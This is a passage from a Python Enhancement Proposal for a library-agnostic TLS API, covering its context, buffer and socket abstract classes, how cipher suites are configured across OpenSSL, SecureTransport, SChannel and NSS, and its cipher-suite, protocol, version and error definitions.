            trust_store = self.trust_store
        if sni_callback is _DEFAULT_VALUE:
            sni_callback = self.sni_callback

        return self.__class__(
            validate_certificates, certificate_chain, ciphers,
            inner_protocols, lowest_supported_version,
            highest_supported_version, trust_store, sni_callback
        )
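As a usage sketch (not from the PEP; system_trust_store and chains_by_hostname are placeholder names), the combination of immutability and update() is what lets an SNI callback derive a per-hostname configuration without mutating the original:
base_config = TLSConfiguration(trust_store=system_trust_store)  # placeholder trust store
def sni_callback(buffer, server_name, config):
    # Return a new, still-immutable configuration offering the certificate
    # chain appropriate for the hostname the client asked for.
    return config.update(certificate_chain=chains_by_hostname[server_name])
config_with_sni = base_config.update(sni_callback=sni_callback)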
Context
We define two Context abstract base classes. These ABCs define objects that
allow configuration of TLS to be applied to specific connections. They can be
thought of as factories for TLSWrappedSocket and TLSWrappedBuffer
objects.
Unlike the current ssl module, we provide two context classes instead of
one. Specifically, we provide the ClientContext and ServerContext
classes. This simplifies the APIs (for example, there is no sense in the server
providing the server_hostname parameter to ssl.SSLContext.wrap_socket,
but because there is only one context class that parameter is still available),
and ensures that implementations know as early as possible which side of a TLS
connection they will serve. Additionally, it allows implementations to opt-out
of one or either side of the connection. For example, SecureTransport on macOS
is not really intended for server use and has an enormous amount of
functionality missing for server-side use. This would allow SecureTransport
implementations to simply not define a concrete subclass of ServerContext
to signal their lack of support.
One of the other major differences to the current ssl module is that a
number of flags and options have been removed. Most of these are self-evident,
but it is worth noting that auto_handshake has been removed from
wrap_socket. This was removed because it fundamentally represents an odd
design wart that saves very minimal effort at the cost of a complexity increase
both for users and implementers. This PEP requires that all users call
do_handshake explicitly after connecting.
As much as possible implementers should aim to make these classes immutable:
that is, they should prefer not to allow users to mutate their internal state
directly, instead preferring to create new contexts from new TLSConfiguration
objects. Obviously, the ABCs cannot enforce this constraint, and so they do not
attempt to.
The Context abstract base class has the following class definition:
TLSBufferObject = Union[TLSWrappedSocket, TLSWrappedBuffer]
class _BaseContext(metaclass=ABCMeta):
@abstractmethod
def __init__(self, configuration: TLSConfiguration):
"""
Create a new context object from a given TLS configuration.
"""
@property
@abstractmethod
def configuration(self) -> TLSConfiguration:
"""
Returns the TLS configuration that was used to create the context.
"""
class ClientContext(_BaseContext):
def wrap_socket(self,
socket: socket.socket,
server_hostname: Optional[str]) -> TLSWrappedSocket:
"""
Wrap an existing Python socket object ``socket`` and return a
``TLSWrappedSocket`` object. ``socket`` must be a ``SOCK_STREAM``
socket: all other socket types are unsupported.
The returned SSL socket is tied to the context, its settings and
certificates. The socket object originally passed to this method
should not be used again: attempting to use it in any way will lead
to undefined behaviour, especially across different TLS
implementations. To get the original socket object back once it has
been wrapped in TLS, see the ``unwrap`` method of the
TLSWrappedSocket.
The parameter ``server_hostname`` specifies the hostname of the
service which we are connecting to. This allows a single server to
host multiple SSL-based services with distinct certificates, quite
similarly to HTTP virtual hosts. This is also used to validate the
TLS certificate for the given hostname. If hostname validation is
not desired, then pass ``None`` for this parameter. This parameter
has no default value because opting-out of hostname validation is
dangerous, and should not be the default behaviour.
"""
buffer = self.wrap_buffers(server_hostname)
return TLSWrappedSocket(socket, buffer)
@abstractmethod
def wrap_buffers(self, server_hostname: Optional[str]) -> TLSWrappedBuffer:
"""
Create an in-memory stream for TLS, using memory buffers to store
incoming and outgoing ciphertext. The TLS routines will read
received TLS data from one buffer, and write TLS data that needs to
be emitted to another buffer.
The implementation details of how this buffering works are up to
the individual TLS implementation. This allows TLS libraries that
have their own specialised support to continue to do so, while
allowing those without to use whatever Python objects they see fit.
The ``server_hostname`` parameter has the same meaning as in
``wrap_socket``.
"""
class ServerContext(_BaseContext):
def wrap_socket(self, socket: socket.socket) -> TLSWrappedSocket:
"""
Wrap an existing Python socket object ``socket`` and return a
``TLSWrappedSocket`` object. ``socket`` must be a ``SOCK_STREAM``
socket: all other socket types are unsupported.
The returned SSL socket is tied to the context, its settings and
certificates. The socket object originally passed to this method
should not be used again: attempting to use it in any way will lead
to undefined behaviour, especially across different TLS
implementations. To get the original socket object back once it has
been wrapped in TLS, see the ``unwrap`` method of the
TLSWrappedSocket.
"""
buffer = self.wrap_buffers()
return TLSWrappedSocket(socket, buffer)
@abstractmethod
def wrap_buffers(self) -> TLSWrappedBuffer:
"""
Create an in-memory stream for TLS, using memory buffers to store
incoming and outgoing ciphertext. The TLS routines will read
received TLS data from one buffer, and write TLS data that needs to
be emitted to another buffer.
The implementation details of how this buffering works are up to
the individual TLS implementation. This allows TLS libraries that
have their own specialised support to continue to do so, while
allowing those without to use whatever Python objects they see fit.
"""
Buffer
The buffer-wrapper ABC will be defined by the TLSWrappedBuffer ABC, which
has the following definition:
class TLSWrappedBuffer(metaclass=ABCMeta):
@abstractmethod
def read(self, amt: int) -> bytes:
"""
Read up to ``amt`` bytes of data from the input buffer and return
the result as a ``bytes`` instance.
Once EOF is reached, all further calls to this method return the
empty byte string ``b''``.
May read "short": that is, fewer bytes may be returned than were
requested.
Raise ``WantReadError`` or ``WantWriteError`` if there is
insufficient data in either the input or output buffer and the
operation would have caused data to be written or read.
May raise ``RaggedEOF`` if the connection has been closed without a
graceful TLS shutdown. Whether this is an exception that should be
ignored or not is up to the specific application.
As at any time a re-negotiation is possible, a call to ``read()``
can also cause write operations.
"""
@abstractmethod
def readinto(self, buffer: Any, amt: int) -> int:
"""
Read up to ``amt`` bytes of data from the input buffer into
``buffer``, which must be an object that implements the buffer
protocol. Returns the number of bytes read.
Once EOF is reached, all further calls to this method return 0.
Raises ``WantReadError`` or ``WantWriteError`` if there is
insufficient data in either the input or output buffer and the
operation would have caused data to be written or read.
May read "short": that is, fewer bytes may be read than were
requested.
May raise ``RaggedEOF`` if the connection has been closed without a
graceful TLS shutdown. Whether this is an exception that should be
ignored or not is up to the specific application.
As at any time a re-negotiation is possible, a call to
``readinto()`` can also cause write operations.
"""
@abstractmethod
def write(self, buf: Any) -> int:
"""
Write ``buf`` in encrypted form to the output buffer and return the
number of bytes written. The ``buf`` argument must be an object
supporting the buffer interface.
Raise ``WantReadError`` or ``WantWriteError`` if there is
insufficient data in either the input or output buffer and the
operation would have caused data to be written or read. In either
case, users should endeavour to resolve that situation and then
re-call this method. When re-calling this method users *should*
re-use the exact same ``buf`` object, as some backends require that
the exact same buffer be used.
This operation may write "short": that is, fewer bytes may be
written than were in the buffer.
As at any time a re-negotiation is possible, a call to ``write()``
can also cause read operations.
"""
@abstractmethod
def do_handshake(self) -> None:
"""
Performs the TLS handshake. Also performs certificate validation
and hostname verification.
"""
@abstractmethod
def cipher(self) -> Optional[Union[CipherSuite, int]]:
"""
Returns the CipherSuite entry for the cipher that has been
negotiated on the connection. If no connection has been negotiated,
returns ``None``. If the cipher negotiated is not defined in
CipherSuite, returns the 16-bit integer representing that cipher
directly.
"""
@abstractmethod
def negotiated_protocol(self) -> Optional[Union[NextProtocol, bytes]]:
"""
Returns the protocol that was selected during the TLS handshake.
This selection may have been made using ALPN, NPN, or some future
negotiation mechanism.
If the negotiated protocol is one of the protocols defined in the
``NextProtocol`` enum, the value from that enum will be returned.
Otherwise, the raw bytestring of the negotiated protocol will be
returned.
If ``Context.set_inner_protocols()`` was not called, if the other
party does not support protocol negotiation, if this socket does
not support any of the peer's proposed protocols, or if the
handshake has not happened yet, ``None`` is returned.
"""
@property
@abstractmethod
def context(self) -> Context:
"""
The ``Context`` object this buffer is tied to.
"""
@abstractproperty
def negotiated_tls_version(self) -> Optional[TLSVersion]:
"""
The version of TLS that has been negotiated on this connection.
"""
@abstractmethod
def shutdown(self) -> None:
"""
Performs a clean TLS shut down. This should generally be used
whenever possible to signal to the remote peer that the content is
finished.
"""
@abstractmethod
def receive_from_network(self, data):
"""
Receives some TLS data from the network and stores it in an
internal buffer.
"""
@abstractmethod
def peek_outgoing(self, amt):
"""
Returns the next ``amt`` bytes of data that should be written to
the network from the outgoing data buffer, without removing it from
the internal buffer.
"""
@abstractmethod
def consume_outgoing(self, amt):
"""
Discard the next ``amt`` bytes from the outgoing data buffer. This
should be used when ``amt`` bytes have been sent on the network, to
signal that the data no longer needs to be buffered.
"""
Socket
The socket-wrapper class will be a concrete class that accepts two items in its
constructor: a regular socket object, and a TLSWrappedBuffer object. This
object will be too large to recreate in this PEP, but will be submitted as part
of the work to build the module.
The wrapped socket will implement all of the socket API, though it will have
stub implementations of methods that only work for sockets with types other
than SOCK_STREAM (e.g. sendto/recvfrom). That limitation can be
lifted as-and-when support for DTLS is added to this module.
In addition, the socket class will include the following extra methods on top
of the regular socket methods:
class TLSWrappedSocket:
def do_handshake(self) -> None:
"""
Performs the TLS handshake. Also performs certificate validation
and hostname verification. This must be called after the socket has
connected (either via ``connect`` or ``accept``), before any other
operation is performed on the socket.
"""
def cipher(self) -> Optional[Union[CipherSuite, int]]:
"""
Returns the CipherSuite entry for the cipher that has been
negotiated on the connection. If no connection has been negotiated,
returns ``None``. If the cipher negotiated is not defined in
CipherSuite, returns the 16-bit integer representing that cipher
directly.
"""
def negotiated_protocol(self) -> Optional[Union[NextProtocol, bytes]]:
"""
Returns the protocol that was selected during the TLS handshake.
This selection may have been made using ALPN, NPN, or some future
negotiation mechanism.
If the negotiated protocol is one of the protocols defined in the
``NextProtocol`` enum, the value from that enum will be returned.
Otherwise, the raw bytestring of the negotiated protocol will be
returned.
If ``Context.set_inner_protocols()`` was not called, if the other
party does not support protocol negotiation, if this socket does
not support any of the peer's proposed protocols, or if the
handshake has not happened yet, ``None`` is returned.
"""
@property
def context(self) -> Context:
"""
The ``Context`` object this socket is tied to.
"""
def negotiated_tls_version(self) -> Optional[TLSVersion]:
"""
The version of TLS that has been negotiated on this connection.
"""
def unwrap(self) -> socket.socket:
"""
Cleanly terminate the TLS connection on this wrapped socket. Once
called, this ``TLSWrappedSocket`` can no longer be used to transmit
data. Returns the socket that was wrapped with TLS.
"""
Cipher Suites
Supporting cipher suites in a truly library-agnostic fashion is a remarkably
difficult undertaking. Different TLS implementations often have radically
different APIs for specifying cipher suites, but more problematically these
APIs frequently differ in capability as well as in style. Some examples are
shown below:
OpenSSL
OpenSSL uses a well-known cipher string format. This format has been adopted as
a configuration language by most products that use OpenSSL, including Python.
This format is relatively easy to read, but has a number of downsides: it is
a string, which makes it remarkably easy to provide bad inputs; it lacks much
detailed validation, meaning that it is possible to configure OpenSSL in a way
that doesn’t allow it to negotiate any cipher at all; and it allows specifying
cipher suites in a number of different ways that make it tricky to parse. The
biggest problem with this format is that there is no formal specification for
it, meaning that the only way to parse a given string the way OpenSSL would is
to get OpenSSL to parse it.
OpenSSL’s cipher strings can look like this:
'ECDH+AESGCM:ECDH+CHACHA20:DH+AESGCM:DH+CHACHA20:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:RSA+AESGCM:RSA+AES:!aNULL:!eNULL:!MD5'
This string demonstrates some of the complexity of the OpenSSL format. For
example, it is possible for one entry to specify multiple cipher suites: the
entry ECDH+AESGCM means “all ciphers suites that include both
elliptic-curve Diffie-Hellman key exchange and AES in Galois Counter Mode”.
More explicitly, that will expand to four cipher suites:
"ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256"
That makes parsing a complete OpenSSL cipher string extremely tricky. Add to this
the fact that there are other meta-characters, such as “!” (exclude all cipher
suites that match this criterion, even if they would otherwise be included:
“!MD5” means that no cipher suites using the MD5 hash algorithm should be
included), “-” (exclude matching ciphers if they were already included, but
allow them to be re-added later if they get included again), and “+” (include
the matching ciphers, but place them at the end of the list), and you get an
extremely complex format to parse. On top of this complexity it should be
noted that the actual result depends on the OpenSSL version, as an OpenSSL
cipher string is valid so long as it contains at least one cipher that OpenSSL
recognises.
OpenSSL also uses different names for its ciphers than the names used in the
relevant specifications. See the manual page for ciphers(1) for more
details.
The actual API inside OpenSSL for the cipher string is simple:
char *cipher_list = <some cipher list>;
int rc = SSL_CTX_set_cipher_list(context, cipher_list);
This means that any format that is used by this module must be able to be
converted to an OpenSSL cipher string for use with OpenSSL.
SecureTransport
SecureTransport is the macOS system TLS library. This library is substantially
more restricted than OpenSSL in many ways, as it has a much more restricted
class of users. One of these substantial restrictions is in controlling
supported cipher suites.
Ciphers in SecureTransport are represented by a C enum. This enum has one
entry per cipher suite, with no aggregate entries, meaning that it is not
possible to reproduce the meaning of an OpenSSL cipher string like
“ECDH+AESGCM” without hand-coding which categories each enum member falls into.
However, the names of most of the enum members are in line with the formal
names of the cipher suites: that is, the cipher suite that OpenSSL calls
“ECDHE-ECDSA-AES256-GCM-SHA384” is called
“TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384” in SecureTransport.
The API for configuring cipher suites inside SecureTransport is simple:
SSLCipherSuite ciphers[] = {TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, ...};
OSStatus status = SSLSetEnabledCiphers(context, ciphers, sizeof(ciphers));
SChannel
SChannel is the Windows system TLS library.
SChannel has extremely restrictive support for controlling available TLS
cipher suites, and additionally adopts a third method of expressing what TLS
cipher suites are supported.
Specifically, SChannel defines a set of ALG_ID constants (C unsigned ints).
Each of these constants does not refer to an entire cipher suite, but instead
an individual algorithm. Some examples are CALG_3DES and CALG_AES_256,
which refer to the bulk encryption algorithm used in a cipher suite,
CALG_DH_EPHEM and CALG_RSA_KEYX which refer to part of the key exchange
algorithm used in a cipher suite, CALG_SHA1 and CALG_MD5 which refer to
the message authentication code used in a cipher suite, and CALG_ECDSA and
CALG_RSA_SIGN which refer to the signing portions of the key exchange
algorithm.
This can be thought of as the half of OpenSSL’s functionality that
SecureTransport doesn’t have: SecureTransport only allows specifying exact
cipher suites, SChannel only allows specifying parts of the cipher
suite, and OpenSSL allows both.
Determining which cipher suites are allowed on a given connection is done by
providing a pointer to an array of these ALG_ID constants. This means that
any suitable API must allow the Python code to determine which ALG_ID
constants must be provided.
Network Security Services (NSS)
NSS is Mozilla’s crypto and TLS library. It’s used in Firefox, Thunderbird,
and as an alternative to OpenSSL in multiple libraries, e.g. curl.
By default, NSS comes with secure configuration of allowed ciphers. On some
platforms such as Fedora, the list of enabled ciphers is globally configured
in a system policy. Generally, applications should not modify cipher suites
unless they have specific reasons to do so.
NSS has both process global and per-connection settings for cipher suites. It
does not have a concept of SSLContext like OpenSSL. An SSLContext-like behavior
can be easily emulated. Specifically, ciphers can be enabled or disabled
globally with SSL_CipherPrefSetDefault(PRInt32 cipher, PRBool enabled),
and SSL_CipherPrefSet(PRFileDesc *fd, PRInt32 cipher, PRBool enabled)
for a connection. The cipher PRInt32 number is a signed 32bit integer
that directly corresponds to a registered IANA id, e.g. 0x1301
is TLS_AES_128_GCM_SHA256. Contrary to OpenSSL, the preference order
of ciphers is fixed and cannot be modified at runtime.
Like SecureTransport, NSS has no API for aggregated entries. Some consumers
of NSS have implemented custom mappings from OpenSSL cipher names and rules
to NSS ciphers, e.g. mod_nss.
Proposed Interface
The proposed interface for the new module is influenced by the combined set of
limitations of the above implementations. Specifically, as every implementation
except OpenSSL requires that each individual cipher be provided, there is no
option but to provide that lowest-common denominator approach.
The simplest approach is to provide an enumerated type that includes a large
subset of the cipher suites defined for TLS. The values of the enum members
will be their two-octet cipher identifier as used in the TLS handshake,
stored as a 16 bit integer. The names of the enum members will be their
IANA-registered cipher suite names.
As of now, the IANA cipher suite registry contains over 320 cipher suites.
A large portion of the cipher suites are irrelevant for TLS connections to
network services. Other suites specify deprecated and insecure algorithms
that are no longer provided by recent versions of implementations. The enum
does not contain ciphers with:
key exchange: NULL, Kerberos (KRB5), pre-shared key (PSK), secure remote
transport (TLS-SRP)
authentication: NULL, anonymous, export grade, Kerberos (KRB5),
pre-shared key (PSK), secure remote transport (TLS-SRP), DSA cert (DSS)
encryption: NULL, ARIA, DES, RC2, export grade 40bit
PRF: MD5
SCSV cipher suites
3DES, RC4, SEED, and IDEA are included for legacy applications. Furthermore,
five additional cipher suites from the TLS 1.3 draft (draft-ietf-tls-tls13-18)
are included, too. TLS 1.3 does not share any cipher suites with TLS 1.2 and
earlier. The resulting enum will contain roughly 110 suites.
Because of these limitations, and because the enum doesn’t contain every
defined cipher, and also to allow for forward-looking applications, all parts
of this API that accept CipherSuite objects will also accept raw 16-bit
integers directly.
Rather than populate this enum by hand, we have a TLS enum script that
builds it from Christian Heimes’ tlsdb JSON file (warning:
large file) and IANA cipher suite registry. The TLSDB also opens up the
possibility of extending the API with additional querying function,
such as determining which TLS versions support which ciphers, if that
functionality is found to be useful or necessary.
If users find this approach to be onerous, a future extension to this API can
provide helpers that can reintroduce OpenSSL’s aggregation functionality.
class CipherSuite(IntEnum):
TLS_RSA_WITH_RC4_128_SHA = 0x0005
TLS_RSA_WITH_IDEA_CBC_SHA = 0x0007
TLS_RSA_WITH_3DES_EDE_CBC_SHA = 0x000a
TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA = 0x0010
TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA = 0x0016
TLS_RSA_WITH_AES_128_CBC_SHA = 0x002f
TLS_DH_RSA_WITH_AES_128_CBC_SHA = 0x0031
TLS_DHE_RSA_WITH_AES_128_CBC_SHA = 0x0033
TLS_RSA_WITH_AES_256_CBC_SHA = 0x0035
TLS_DH_RSA_WITH_AES_256_CBC_SHA = 0x0037
TLS_DHE_RSA_WITH_AES_256_CBC_SHA = 0x0039
TLS_RSA_WITH_AES_128_CBC_SHA256 = 0x003c
TLS_RSA_WITH_AES_256_CBC_SHA256 = 0x003d
TLS_DH_RSA_WITH_AES_128_CBC_SHA256 = 0x003f
TLS_RSA_WITH_CAMELLIA_128_CBC_SHA = 0x0041
TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA = 0x0043
TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA = 0x0045
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 = 0x0067
TLS_DH_RSA_WITH_AES_256_CBC_SHA256 = 0x0069
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 = 0x006b
TLS_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0084
TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0086
TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0088
TLS_RSA_WITH_SEED_CBC_SHA = 0x0096
TLS_DH_RSA_WITH_SEED_CBC_SHA = 0x0098
TLS_DHE_RSA_WITH_SEED_CBC_SHA = 0x009a
TLS_RSA_WITH_AES_128_GCM_SHA256 = 0x009c
TLS_RSA_WITH_AES_256_GCM_SHA384 = 0x009d
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 = 0x009e
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 = 0x009f
TLS_DH_RSA_WITH_AES_128_GCM_SHA256 = 0x00a0
TLS_DH_RSA_WITH_AES_256_GCM_SHA384 = 0x00a1
TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0x00ba
TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0x00bc
TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0x00be
TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256 = 0x00c0
TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256 = 0x00c2
TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256 = 0x00c4
TLS_AES_128_GCM_SHA256 = 0x1301
TLS_AES_256_GCM_SHA384 = 0x1302
TLS_CHACHA20_POLY1305_SHA256 = 0x1303
TLS_AES_128_CCM_SHA256 = 0x1304
TLS_AES_128_CCM_8_SHA256 = 0x1305
TLS_ECDH_ECDSA_WITH_RC4_128_SHA = 0xc002
TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA = 0xc003
TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA = 0xc004
TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA = 0xc005
TLS_ECDHE_ECDSA_WITH_RC4_128_SHA = 0xc007
TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA = 0xc008
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA = 0xc009
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA = 0xc00a
TLS_ECDH_RSA_WITH_RC4_128_SHA = 0xc00c
TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA = 0xc00d
TLS_ECDH_RSA_WITH_AES_128_CBC_SHA = 0xc00e
TLS_ECDH_RSA_WITH_AES_256_CBC_SHA = 0xc00f
TLS_ECDHE_RSA_WITH_RC4_128_SHA = 0xc011
TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA = 0xc012
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA = 0xc013
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA = 0xc014
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 = 0xc023
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 = 0xc024
TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256 = 0xc025
TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384 = 0xc026
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 = 0xc027
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 = 0xc028
TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256 = 0xc029
TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384 = 0xc02a
TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 = 0xc02b
TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 = 0xc02c
TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256 = 0xc02d
TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384 = 0xc02e
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 = 0xc02f
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 = 0xc030
TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256 = 0xc031
TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384 = 0xc032
TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc072
TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc073
TLS_ECDH_ECDSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc074
TLS_ECDH_ECDSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc075
TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc076
TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc077
TLS_ECDH_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc078
TLS_ECDH_RSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc079
TLS_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc07a
TLS_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc07b
TLS_DHE_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc07c
TLS_DHE_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc07d
TLS_DH_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc07e
TLS_DH_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc07f
TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc086
TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc087
TLS_ECDH_ECDSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc088
TLS_ECDH_ECDSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc089
TLS_ECDHE_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc08a
TLS_ECDHE_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc08b
TLS_ECDH_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc08c
TLS_ECDH_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc08d
TLS_RSA_WITH_AES_128_CCM = 0xc09c
TLS_RSA_WITH_AES_256_CCM = 0xc09d
TLS_DHE_RSA_WITH_AES_128_CCM = 0xc09e
TLS_DHE_RSA_WITH_AES_256_CCM = 0xc09f
TLS_RSA_WITH_AES_128_CCM_8 = 0xc0a0
TLS_RSA_WITH_AES_256_CCM_8 = 0xc0a1
TLS_DHE_RSA_WITH_AES_128_CCM_8 = 0xc0a2
TLS_DHE_RSA_WITH_AES_256_CCM_8 = 0xc0a3
TLS_ECDHE_ECDSA_WITH_AES_128_CCM = 0xc0ac
TLS_ECDHE_ECDSA_WITH_AES_256_CCM = 0xc0ad
TLS_ECDHE_ECDSA_WITH_AES_128_CCM_8 = 0xc0ae
TLS_ECDHE_ECDSA_WITH_AES_256_CCM_8 = 0xc0af
TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 = 0xcca8
TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 = 0xcca9
TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256 = 0xccaa
Enum members can be mapped to OpenSSL cipher names:
>>> import ssl
>>> ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
>>> ctx.set_ciphers('ALL:COMPLEMENTOFALL')
>>> ciphers = {c['id'] & 0xffff: c['name'] for c in ctx.get_ciphers()}
>>> ciphers[CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256]
'ECDHE-RSA-AES128-GCM-SHA256'
For SecureTransport, these enum members directly refer to the values of the
cipher suite constants. For example, SecureTransport defines the cipher suite
enum member TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 as having the value
0xC02C. Not coincidentally, that is identical to its value in the above
enum. This makes mapping between SecureTransport and the above enum very easy
indeed.
For SChannel there is no easy direct mapping, due to the fact that SChannel
configures ciphers, instead of cipher suites. This represents an ongoing
concern with SChannel, which is that it is very difficult to configure in a
specific manner compared to other TLS implementations.
For the purposes of this PEP, any SChannel implementation will need to
determine which ciphers to choose based on the enum members. This may be more
permissive than the cipher suite list intends to allow, or it may be
more restrictive, depending on the choices of the implementation. This PEP
recommends that it be more restrictive, but of course this cannot be enforced.
Protocol Negotiation
Both NPN and ALPN allow for protocol negotiation as part of the TLS
handshake. While NPN and ALPN are, at their fundamental level, built on top of
bytestrings, string-based APIs are frequently problematic as they allow for
errors in typing that can be hard to detect.
For this reason, this module would define a type that protocol negotiation
implementations can pass and be passed. This type would wrap a bytestring to
allow for aliases for well-known protocols. This allows us to avoid the
problems inherent in typos for well-known protocols, while allowing the full
extensibility of the protocol negotiation layer if needed by letting users pass
byte strings directly.
class NextProtocol(Enum):
H2 = b'h2'
H2C = b'h2c'
HTTP1 = b'http/1.1'
WEBRTC = b'webrtc'
C_WEBRTC = b'c-webrtc'
FTP = b'ftp'
STUN = b'stun.nat-discovery'
TURN = b'stun.turn'
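For illustration only, negotiation targets may be given as NextProtocol
members or as raw byte strings. The inner_protocols field of the
TLSConfiguration object described elsewhere in this PEP is assumed here:
config = TLSConfiguration(
    inner_protocols=(NextProtocol.H2, NextProtocol.HTTP1, b'bespoke-proto/1'),
)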
TLS Versions
It is often useful to be able to restrict the versions of TLS you’re willing to
support. There are many security advantages in refusing to use old versions of
TLS, and some misbehaving servers will mishandle TLS clients advertising
support for newer versions.
The following enumerated type can be used to gate TLS versions. Forward-looking
applications should almost never set a maximum TLS version unless they
absolutely must, as a TLS backend that is newer than the Python that uses it
may support TLS versions that are not in this enumerated type.
Additionally, this enumerated type defines two additional flags that can always
be used to request either the lowest or highest TLS version supported by an
implementation.
class TLSVersion(Enum):
MINIMUM_SUPPORTED = auto()
SSLv2 = auto()
SSLv3 = auto()
TLSv1 = auto()
TLSv1_1 = auto()
TLSv1_2 = auto()
TLSv1_3 = auto()
MAXIMUM_SUPPORTED = auto()
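A hedged sketch of gating versions, assuming the lowest_supported_version and
highest_supported_version fields of the TLSConfiguration object described
elsewhere in this PEP:
config = TLSConfiguration(
    lowest_supported_version=TLSVersion.TLSv1_2,
    highest_supported_version=TLSVersion.MAXIMUM_SUPPORTED,
)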
Errors
This module would define four base classes for use with error handling. Unlike
many of the other classes defined here, these classes are not abstract, as
they have no behaviour. They exist simply to signal certain common behaviours.
Backends should subclass these exceptions in their own packages, but needn’t
define any behaviour for them.
In general, concrete implementations should subclass these exceptions rather
than throw them directly. This makes it moderately easier to determine which
concrete TLS implementation is in use during debugging of unexpected errors.
However, this is not mandatory.
The definitions of the errors are below:
class TLSError(Exception):
"""
The base exception for all TLS related errors from any backend.
Catching this error should be sufficient to catch *all* TLS errors,
regardless of what backend is used.
"""
class WantWriteError(TLSError):
"""
A special signaling exception used only when non-blocking or
buffer-only I/O is used. This error signals that the requested
operation cannot complete until more data is written to the network,
or until the output buffer is drained.
This error should only be raised when it is completely impossible
to write any data. If a partial write is achievable then this should
not be raised.
"""
class WantReadError(TLSError):
"""
A special signaling exception used only when non-blocking or
buffer-only I/O is used. This error signals that the requested
operation cannot complete until more data is read from the network, or
until more data is available in the input buffer.
This error should only be raised when it is completely impossible to
read any data. If a partial read is achievable then this should not
be raised.
"""
class RaggedEOF(TLSError):
"""
A special signaling exception used when a TLS connection has been
closed gracelessly: that is, when a TLS CloseNotify was not received
from the peer before the underlying TCP socket reached EOF. This is a
so-called "ragged EOF".
This exception is not guaranteed to be raised in the face of a ragged
EOF: some implementations may not be able to detect or report the
ragged EOF.
This exception is not always a problem. Ragged EOFs are a concern only
when protocols are vulnerable to length truncation attacks. Any
protocol that can detect length truncation attacks at the application
layer (e.g. HTTP/1.1 and HTTP/2) is not vulnerable to this kind of
attack and so can ignore this exception.
"""
Certificates
This module would define an abstract X509 certificate class. This class would
have almost no behaviour, as the goal of this module is not to provide all
